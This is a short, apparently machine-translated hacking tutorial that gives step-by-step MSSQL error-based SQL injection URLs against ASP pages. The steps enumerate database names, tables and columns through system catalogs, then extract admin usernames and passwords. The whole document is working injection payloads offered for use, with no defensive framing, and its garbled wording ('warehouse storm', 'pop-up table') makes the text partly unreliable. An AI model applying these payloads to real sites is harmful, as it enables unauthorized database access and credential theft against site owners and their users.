General steps from brute-force database to brute-force password

I read the cross-database query that I wrote, and I sorted out the general information from the brute-force database to the brute-force password.
Steps to make the idea clearer.
SQL INJECTION is flexible and changeable, and the INJECTION statements are different. below, only the general
Step, hope to help you.
1: All Database names are exposed.
Http://www.xxx.com/xxx.asp? Id = 1 and 0 <> (select count (*)
From master. dbo. sysdatabases where name> 1 and dbid = 6)
Submit dbid =, 9... to get more database names.
2: tables in the warehouse storm
If a bbs database exists, submit the following statement:
Asp? Http://www.xxx.com/jump.asp? Id = 1 and 0 <> (select top 1 name
From bbs. dbo. sysobjects where xtype = 'U ')
To obtain a table. Assume It is admin.
Submit:
Http://www.xxx.com/jump.asp? Id = 1 and 0 <> (select top 1 name
From bbs. dbo. sysobjects where xtype = 'U' and name not in
('Admin '))
To obtain other tables.
3: fields in the pop-up table
Submit:
Http://www.xxx.com/xxx.asp? Id = 1 and 0 <> (select count (*)
From bbs. dbo. sysobjects where xtype = 'U' and name = 'admin'
And uid> (str (id )))
Assume that the UID value is 18779569 uid = id.
Submit:
Http://www.xxx.com/xxx.asp? Id = 1 and 0 <> (select top 1 name
From bbs. dbo. syscolumns where id = 18779569)
Obtain an admin field, which is assumed to be user_id.
Submit:
Http://www.xxx.com/xxx.asp? Id = 1 and 0 <> (select top 1 name
From bbs. dbo. syscolumns where id = 18779569 and name not in
('Id ',...))
To expose other fields
4: exposed username and password
If the user_id username, password, and other fields exist, submit:
Http://www.xxx.com/xxx.asp? Id = 1 and 0 <(select user_id from
BBS. dbo. admin where username> 1)
The user name can be obtained.
The password can be obtained in sequence.